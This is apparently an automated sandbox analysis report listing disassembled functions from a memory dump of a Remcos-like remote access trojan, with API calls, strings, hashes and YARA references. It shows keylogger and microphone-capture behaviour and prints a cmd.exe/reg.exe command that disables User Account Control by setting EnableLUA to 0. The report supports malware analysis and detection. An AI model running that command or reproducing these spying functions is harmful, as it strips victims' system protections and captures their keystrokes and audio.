                                                                                                                        • Opcode Fuzzy Hash: 02ebf15cc76629c9cb4ed64f85c7f099d2cf375e9eb1dd87a962a242be715a40
                                                                                                                        • Instruction Fuzzy Hash: 95F02D3594870167C72276B95D0CF7F25EFAFD17B1F140528F514A2180EF38C5554910
                                                                                                                        Function 0293A81D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02932584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 029325A6
                                                                                                                          • Part of subcall function 02932584: RegQueryValueExW.ADVAPI32(?,0292E0BA,00000000,00000000,?,00000400), ref: 029325C5
                                                                                                                          • Part of subcall function 02932584: RegCloseKey.ADVAPI32(?), ref: 029325CE
                                                                                                                          • Part of subcall function 0293B15B: GetCurrentProcess.KERNEL32(?,?,?,0292C914,WinDir,00000000,00000000), ref: 0293B16C
                                                                                                                        • _wcslen.LIBCMT ref: 0293A8F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                        • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                                                                        • API String ID: 37874593-4246244872
                                                                                                                        • Opcode ID: 2fe3b5892273eafccf88118e3aa6793431e677025ea8740588481b31885b3124
                                                                                                                        • Instruction ID: aac7eb06774f61605552eecfc1c7abea21e7dbe88611e15a0c7f1b9410d40ce3
                                                                                                                        • Opcode Fuzzy Hash: 2fe3b5892273eafccf88118e3aa6793431e677025ea8740588481b31885b3124
                                                                                                                        • Instruction Fuzzy Hash: D9219262B002282BEF19BBB48C95DAE37AF9FC5354F18093DE406B72C5ED709D1D4A60
                                                                                                                        Function 0292A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0292A884
                                                                                                                        • wsprintfW.USER32 ref: 0292A905
                                                                                                                          • Part of subcall function 02929D58: SetEvent.KERNEL32(?,?,00000000,0292A91C,00000000), ref: 02929D84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EventLocalTimewsprintf
                                                                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                        • API String ID: 1497725170-248792730
                                                                                                                        • Opcode ID: 67117dc675662f8b1885811f39e9bf6e0277a50fe9be424b99b2a98b66e7a825
                                                                                                                        • Instruction ID: e4035949492ad5b92d7014788fe9d548bb7819f9e3600c7bbbaf50843ef19615
                                                                                                                        • Opcode Fuzzy Hash: 67117dc675662f8b1885811f39e9bf6e0277a50fe9be424b99b2a98b66e7a825
                                                                                                                        • Instruction Fuzzy Hash: B0116372504128AACB1CFB94EC50CFF77B9EE94321B00012EF50666194EF785A9ACAA4
                                                                                                                        Function 0293CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegisterClassExA.USER32(00000030), ref: 0293CA6C
                                                                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0293CA87
                                                                                                                        • GetLastError.KERNEL32 ref: 0293CA91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                        • String ID: 0$MsgWindowClass
                                                                                                                        • API String ID: 2877667751-2410386613
                                                                                                                        • Opcode ID: 30c22a0d31ddc700d9dc30b1ee42122aa7640f0d39e667a927e10b9faae40e6c
                                                                                                                        • Instruction ID: 665c8904352c9fbd4d9bcbe2b382f6f779a66655575bc04406191916d4ea0930
                                                                                                                        • Opcode Fuzzy Hash: 30c22a0d31ddc700d9dc30b1ee42122aa7640f0d39e667a927e10b9faae40e6c
                                                                                                                        • Instruction Fuzzy Hash: D901E5B1D1461EAB8B01DFEAD8C49EFFBBDFE49258B54052AE414F2100E7704A448BA0
                                                                                                                        Function 029269BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02926A00
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02926A0F
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02926A14
                                                                                                                        Strings
                                                                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 029269F6
                                                                                                                        • C:\Windows\System32\cmd.exe, xrefs: 029269FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                        • API String ID: 2922976086-4183131282
                                                                                                                        • Opcode ID: fdb4d207fd2ef546d4dedeca5a4ae1d543a664c51f135156d2a5503a8b82810f
                                                                                                                        • Instruction ID: d7048690b9ff10635b91dc72577f9f2ceb57d4e3d92229205501548f353867aa
                                                                                                                        • Opcode Fuzzy Hash: fdb4d207fd2ef546d4dedeca5a4ae1d543a664c51f135156d2a5503a8b82810f
                                                                                                                        • Instruction Fuzzy Hash: 87F09076D402A87ADB20AAE6DC0DFDFBF3CEBC1B10F410419BA15A6050D6705104CAB0
                                                                                                                        Function 029625D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0296258A,00000003,?,0296252A,00000003,0298DAE0,0000000C,02962681,00000003,00000002), ref: 029625F9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0296260C
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0296258A,00000003,?,0296252A,00000003,0298DAE0,0000000C,02962681,00000003,00000002,00000000), ref: 0296262F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 0d7a03a32280e201ceeab004f47251259c4888e1079d8c966d56975719b723eb
                                                                                                                        • Instruction ID: 2588b37d7d5dce4eb6193642c05e9ee604bcf48de332f2c007e401624569c046
                                                                                                                        • Opcode Fuzzy Hash: 0d7a03a32280e201ceeab004f47251259c4888e1079d8c966d56975719b723eb
                                                                                                                        • Instruction Fuzzy Hash: 4EF08730E84209ABDB119FA5D809BADBBB8EB48755F0044A9F805A2250EB308A54CB94
                                                                                                                        Function 02924AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02924AED
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0292483F,00000001), ref: 02924AF9
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0292483F,00000001), ref: 02924B04
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0292483F,00000001), ref: 02924B0D
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                        • String ID: KeepAlive | Disabled
                                                                                                                        • API String ID: 2993684571-305739064
                                                                                                                        • Opcode ID: 7254256ea7afbedf7d24bf448488e2f793f15a1851ebb000262b119b9b20ab7f
                                                                                                                        • Instruction ID: 7ab91784c2510ece7e963c908ca1c9688bc2b5908c9eb7ce6f33cd40d302a52a
                                                                                                                        • Opcode Fuzzy Hash: 7254256ea7afbedf7d24bf448488e2f793f15a1851ebb000262b119b9b20ab7f
                                                                                                                        • Instruction Fuzzy Hash: ECF02B75D043506FEB1137B48C0D6FABF9DAB42320F000D2DF4A282664CA608868CB52
                                                                                                                        Function 0293BE6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0293BF02), ref: 0293BE79
                                                                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0293BF02), ref: 0293BE86
                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0293BF02), ref: 0293BE93
                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0293BF02), ref: 0293BEA6
                                                                                                                        Strings
                                                                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0293BE99
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                        • API String ID: 3024135584-2418719853
                                                                                                                        • Opcode ID: 9ef7c17e662dd68f2ce7dbcdcfab6c73afceb012f739f9d78cb119d3c29be419
                                                                                                                        • Instruction ID: f9e65f43fa0f093fa1873e89e8e2f03548a0219081772d592acca1267a4ad574
                                                                                                                        • Opcode Fuzzy Hash: 9ef7c17e662dd68f2ce7dbcdcfab6c73afceb012f739f9d78cb119d3c29be419
                                                                                                                        • Instruction Fuzzy Hash: 26E04F73584248ABD31037F5AC4DCFB7B7CEB84612B100925F6129028AD97044588770
                                                                                                                        Function 0296016A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 404200276d4555367548e779600983eb25dd801cd18c694adc6daedd7cec8415
                                                                                                                        • Instruction ID: 926101ebff58310b5211a055317e10987309fa1616c9a2f67feb6a7d10bd5c1b
                                                                                                                        • Opcode Fuzzy Hash: 404200276d4555367548e779600983eb25dd801cd18c694adc6daedd7cec8415
                                                                                                                        • Instruction Fuzzy Hash: AD718171908616DBCB21CB95C8C8EBEBBF9FF45365F184629E825A7180D7B09941CBA0
                                                                                                                        Function 0292E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0293B15B: GetCurrentProcess.KERNEL32(?,?,?,0292C914,WinDir,00000000,00000000), ref: 0293B16C
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0292E6C1
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0292E6E5
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0292E6F4
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0292E8AB
                                                                                                                          • Part of subcall function 0293B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0292E4D0,00000000,?,?,02994358), ref: 0293B19C
                                                                                                                          • Part of subcall function 0293B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0293B395
                                                                                                                          • Part of subcall function 0293B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0293B3A8
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0292E89C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4269425633-0
                                                                                                                        • Opcode ID: 30d23c001ae9414324a2b2268f3bf503255aa3c57bbf2d5d604b68886b9b2e62
                                                                                                                        • Instruction ID: 158291c78a321f5e972d20dafcf47dbc3f9892ab522c430cdef8c1d7519ae5cb
                                                                                                                        • Opcode Fuzzy Hash: 30d23c001ae9414324a2b2268f3bf503255aa3c57bbf2d5d604b68886b9b2e62
                                                                                                                        • Instruction Fuzzy Hash: 8241E2315082505BC325FB60EC60AEFB3EAAFE4310F50452DE58E86195EF70A95DCF56
                                                                                                                        Function 02963098 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 6a628f91dc3d68fa89423bff19da0c1fb4dc23ad4d9f2e463366119044bbd459
                                                                                                                        • Instruction ID: 5c7c1fd680b322a6df5f5376679ddaf8b788970e0f41914373ad982e6f92b5d1
                                                                                                                        • Opcode Fuzzy Hash: 6a628f91dc3d68fa89423bff19da0c1fb4dc23ad4d9f2e463366119044bbd459
                                                                                                                        • Instruction Fuzzy Hash: BE41B236F002049FCB24DF78C884A6DB7F6EF85714F1685A9D915EB281DB31A901CB84
                                                                                                                        Function 0296FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0295E3ED,?,00000000,?,00000001,?,?,00000001,0295E3ED,?), ref: 0296FF20
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0296FF58
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0296FFA9
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,029599BF,?), ref: 0296FFBB
                                                                                                                        • __freea.LIBCMT ref: 0296FFC4
                                                                                                                          • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 313313983-0
                                                                                                                        • Opcode ID: 33aa7148665baeef006cb61d6b4f8fd460edac85055bff8e4a108c6ca4deec49
                                                                                                                        • Instruction ID: 2e90e81b8a787974ba836dd9f8fa3737bc3be7d959f37cd39fe600b31b6f4e43
                                                                                                                        • Opcode Fuzzy Hash: 33aa7148665baeef006cb61d6b4f8fd460edac85055bff8e4a108c6ca4deec49
                                                                                                                        • Instruction Fuzzy Hash: 0331DE32A0021AAFDB248F64EC48EBF7BE9EF41314B050569FC15D6140EB35CD50CBA0
                                                                                                                        Function 0292196B Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0292197B
                                                                                                                        • waveInOpen.WINMM(02991AF8,000000FF,02991B00,Function_00001A8E,00000000,00000000,00000024), ref: 02921A11
                                                                                                                        • waveInPrepareHeader.WINMM(02991AC0,00000020,00000000), ref: 02921A66
                                                                                                                        • waveInAddBuffer.WINMM(02991AC0,00000020), ref: 02921A75
                                                                                                                        • waveInStart.WINMM ref: 02921A81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1356121797-0
                                                                                                                        • Opcode ID: b81b0c3e31bc8c9d460c5440555ae22cdfcc16ff0dda2b2f5a5f62e805057717
                                                                                                                        • Instruction ID: d93de511089c6ef2ed5f32652da9e4cc46e6690a686bec893fe43ef7027a8b61
                                                                                                                        • Opcode Fuzzy Hash: b81b0c3e31bc8c9d460c5440555ae22cdfcc16ff0dda2b2f5a5f62e805057717
                                                                                                                        • Instruction Fuzzy Hash: 6221AE31E892029BC7049F6EB91497A7BAAFB94731700482EE11DC77A8E7B40C24CB64
                                                                                                                        Function 0292FBEF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0292FBFC
                                                                                                                        • int.LIBCPMT ref: 0292FC0F
                                                                                                                          • Part of subcall function 0292CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0292CEF1
                                                                                                                          • Part of subcall function 0292CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0292CF0B
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0292FC4B
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0292FC71
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0292FC8D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2536120697-0
                                                                                                                        • Opcode ID: f23bba60ff1ae03b1635e4cf156a9852078c4b7152df3b7dc15f19b9d1d2dfb8
                                                                                                                        • Instruction ID: 060dd603eed1e560795fcd6cfbc2574e899804878e891691f95fb2c28e628090
                                                                                                                        • Opcode Fuzzy Hash: f23bba60ff1ae03b1635e4cf156a9852078c4b7152df3b7dc15f19b9d1d2dfb8
                                                                                                                        • Instruction Fuzzy Hash: 1711B472A00538A7CF15FBA8D940CEEB7BA9FD0764B110459E905A7184EB309F4ACBD1
                                                                                                                        Function 0296E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0296E144
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0296E167
                                                                                                                          • Part of subcall function 02966AFF: RtlAllocateHeap.NTDLL(00000000,0292E5AC,00000000,?,02953627,0292E5AC,?,02922BE9,029942E0,02922F1C,00000000,029942E0,029284A8,?,?,029942E0), ref: 02966B31
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0296E18D
                                                                                                                        • _free.LIBCMT ref: 0296E1A0
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0296E1AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 336800556-0
                                                                                                                        • Opcode ID: c9d636ca90daca48e0c4ec3adf761b344abe739e9c78b648b2106ddf4aa81279
                                                                                                                        • Instruction ID: cbf04cd2aaa948bee58c867766e174b44f806db73b860135b090850767225504
                                                                                                                        • Opcode Fuzzy Hash: c9d636ca90daca48e0c4ec3adf761b344abe739e9c78b648b2106ddf4aa81279
                                                                                                                        • Instruction Fuzzy Hash: F301F776A457117F73255ABA6C8CCBBBFAEDEC2EA53160529FC04C6104DF618C01D5B1
                                                                                                                        Function 0292FED2 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0292FEDF
                                                                                                                        • int.LIBCPMT ref: 0292FEF2
                                                                                                                          • Part of subcall function 0292CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0292CEF1
                                                                                                                          • Part of subcall function 0292CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0292CF0B
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0292FF2E
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0292FF54
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0292FF70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2536120697-0
                                                                                                                        • Opcode ID: 02be082eb7c3c494d42a36f688b48872b5951876dc522b87c179cc0a2a3668ef
                                                                                                                        • Instruction ID: 016c5a95695fca8f732cfe6558fd818a7c7c7b1cf1c5ed4350f049a00b9cdda3
                                                                                                                        • Opcode Fuzzy Hash: 02be082eb7c3c494d42a36f688b48872b5951876dc522b87c179cc0a2a3668ef
                                                                                                                        • Instruction Fuzzy Hash: 14117371900538ABCF15FBA4C5548EEB77A9FC1354B110469E915672C4EB309F4ACF91
                                                                                                                        Function 0296F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0296F7B5
                                                                                                                          • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000), ref: 02966ADB
                                                                                                                          • Part of subcall function 02966AC5: GetLastError.KERNEL32(00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000,00000000), ref: 02966AED
                                                                                                                        • _free.LIBCMT ref: 0296F7C7
                                                                                                                        • _free.LIBCMT ref: 0296F7D9
                                                                                                                        • _free.LIBCMT ref: 0296F7EB
                                                                                                                        • _free.LIBCMT ref: 0296F7FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
